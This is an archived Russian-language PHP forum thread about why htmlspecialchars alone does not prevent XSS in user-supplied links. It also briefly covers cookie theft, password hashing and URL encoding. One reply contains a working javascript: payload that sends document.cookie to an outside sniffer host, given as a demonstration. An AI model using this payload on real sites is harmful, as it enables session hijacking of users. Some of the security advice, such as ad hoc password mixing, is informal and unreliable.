[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: экранирование url
артем23
Самый нормальный и единственный способ экранирования от кавычек и соответственно xss атак является функция htmlspecialchars($url, ENT_QUOTES)

верно?



Спустя 2 минуты, 55 секунд (28.06.2010 - 10:07) twin написал(а):
Нет.

Спустя 1 минута, 17 секунд (28.06.2010 - 10:08) артем23 написал(а):
пожалуйста, поясните


вывод в браузер допустим такой строки

<a href="htmlcpacialchars($url, ENT_QUOTES)"></a>


$url берется от пользователя

Спустя 12 минут, 57 секунд (28.06.2010 - 10:21) Basili4 написал(а):
Цитата (артем23 @ 28.06.2010 - 11:04)
от кавычек и соответственно xs

допущение ввода ковычек это не еще не возможность атаки вот Я пишу " и ' и ничего

ps а чем вам не гадила ссылка через ридерект её и волшебные слова типа javasript: рубите.

Спустя 2 минуты, 21 секунда (28.06.2010 - 10:23) артем23 написал(а):
А если написать href = "www.site.ru?url='какой нить селект запрос или редирект на сайт приемник паролей'" Это возможно?

Спустя 1 минута, 51 секунда (28.06.2010 - 10:25) twin написал(а):
Вопрос некорректен.
Защитой от любых видов атак (xss в частности) - это правильная работа с данными, полученными извне.

Нельзя обойтись одной только функцией htmlspecialchars(), и уж тем паче нельзя объявить её как
Цитата
Самый нормальный и единственный способ экранирования

Для начала - она ничего не экранирует. Экранирование - это добавление к символу другого спецсимвола( обратный слэш).

А дальше нужно смотреть по условиям задачи.

Одно совершенно определенно. Нет панацеи и универсального решения, которое помогло бы забыть о безопасности раз и навсегда. Вместо поисков такового лучше заняться изучением основ корректной работы с данными.

Спустя 4 минуты, 42 секунды (28.06.2010 - 10:30) Basili4 написал(а):
ну и будет там select кто его исполнять будет я надеюсь вы не передаете на вашем сайте запросы параметрами.

Спустя 1 минута, 26 секунд (28.06.2010 - 10:31) артем23 написал(а):
Basili4 )))))) смешно ,конечно

Ладно, про селект это я так, а как насчет хеш атаки

Спустя 5 минут, 41 секунда (28.06.2010 - 10:37) артем23 написал(а):
Цитата (twin @ 28.06.2010 - 07:25)
Вопрос некорректен.
Защитой от любых видов атак (xss в частности) - это правильная работа с данными, полученными извне.

Нельзя обойтись одной только функцией  htmlspecialchars(), и уж тем паче нельзя объявить её как
Цитата
Самый нормальный и единственный способ экранирования

Для начала - она ничего не экранирует. Экранирование - это добавление к символу другого спецсимвола( обратный слэш).

А дальше нужно смотреть по условиям задачи.

Одно совершенно определенно. Нет панацеи и универсального решения, которое помогло бы забыть о безопасности раз и навсегда. Вместо поисков такового лучше заняться изучением основ корректной работы с данными.

а вот такие рассуждения неверны?

Вот пришла нам из формы переменная на скрипт, образовалась страничка с этой переменной. И если сидит в href "адрес с хакерским ресурсом". Если бы мы экранировали эту переменную, ничего бы и не произошло

Задача ссужена и конкретизирована, какие шаги и решения на Ваш взгляд?

Спустя 1 минута, 33 секунды (28.06.2010 - 10:39) Basili4 написал(а):
Цитата (артем23 @ 28.06.2010 - 11:31)
хеш атаки

это всмысле воровства кук ????? воровство прочветает чтобы куки с вашего сайта не утащили есть несколько способов точнее параметров при сбросе кук. атрибут Secure например.

а еще вот тут можно почитать http://msdn.microsoft.com/en-us/library/ms533046.aspx

Спустя 2 минуты, 16 секунд (28.06.2010 - 10:41) артем23 написал(а):
почему только кук. обычные хеш атаки, коих много

Спустя 11 минут, 57 секунд (28.06.2010 - 10:53) Basili4 написал(а):
давайте определимся с терменологией под хеш атакой вы подразумеваете подбор пораоля имея его хеш. Так ?. Существет достаточно простой механизм знизить возможность такой атаки. добавление набора символов в количестве 20 шт. не в канец пароля а скажем путем не сложного перемешивания. даже если и и кто подберет к хешу последовательность символом то тут еще встанет вопрос какие из символов есть пароль вот и все.

Спустя 3 минуты, 41 секунда (28.06.2010 - 10:56) артем23 написал(а):
с хеш разобрались, а как насчет xss атак?

и тот же вопрос )

а вот такие рассуждения неверны?

Вот пришла нам из формы переменная на скрипт, образовалась страничка с этой переменной. И если сидит в href "адрес с хакерским ресурсом". Если бы мы экранировали эту переменную, ничего бы и не произошло

Задача ссужена и конкретизирована, какие шаги и решения на Ваш взгляд?

Спустя 1 час, 2 минуты, 56 секунд (28.06.2010 - 11:59) twin написал(а):
Во первых, прежде чем образовалась страничка с переменной, должен отработать скрипт. То есть он должен (обязан) работать с этой переменной (иначе для чего она). Так вот правильная обработка в зависимости от поставленной задачи и есть основа безопасности.

Цитата
Задача ссужена и конкретизирована, какие шаги и решения на Ваш взгляд?

Вовсе нет. Ничего тут не конкретизировано. Откуда и как эти данные попали в href ссылки? И чем тут поможет так называемое "экранирование"? (когда же научитесь называть вещи своими именами...)

Если это допустим из bb-редактора, то запостив туда такой текст
javascript: location.href='http://sniffer.ch?c='+encodeURIComponent(document.cookie)
жулик стащит все куки и никакое "экранирование" не поможет. Попробуй.
Тут нужно обязательно добавлять протокол.

И так в каждом конкретном случае.

Спустя 20 часов, 46 минут, 9 секунд (29.06.2010 - 08:46) Kuzya написал(а):
Эх жаль я в выходные сюда не заглядывал smile.gif
Полностью согласен с twin. Любая защита от любых атак инъективной группы (XSS, CRLF-inj, SQL-inj, XPath-inj и т.д.) должна быть ориентирована на конкретную ситуацию, и каких-то уникальный решений тут нет.

Спустя 2 года, 22 дня, 2 часа, 22 минуты, 5 секунд (21.07.2012 - 11:08) Гость_alexblade написал(а):
стоп стоп товарищи. экранирование html и экранирование ссылок это разные вещи.

htmlspecialchars для хтмл нужен а не для ссылок

а вот подскажите для ссылок что нужно ? у меня в данных передаваемых через ссылки есть & который обрабатывается соответсвующим образом (как разделитель переменых) а не должен. как мне это экранировать или что с этим делать ?

Спустя 2 дня, 1 час, 57 минут, 39 секунд (23.07.2012 - 13:05) alexblade написал(а):
urlencode вроде подходит
Быстрый ответ:

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.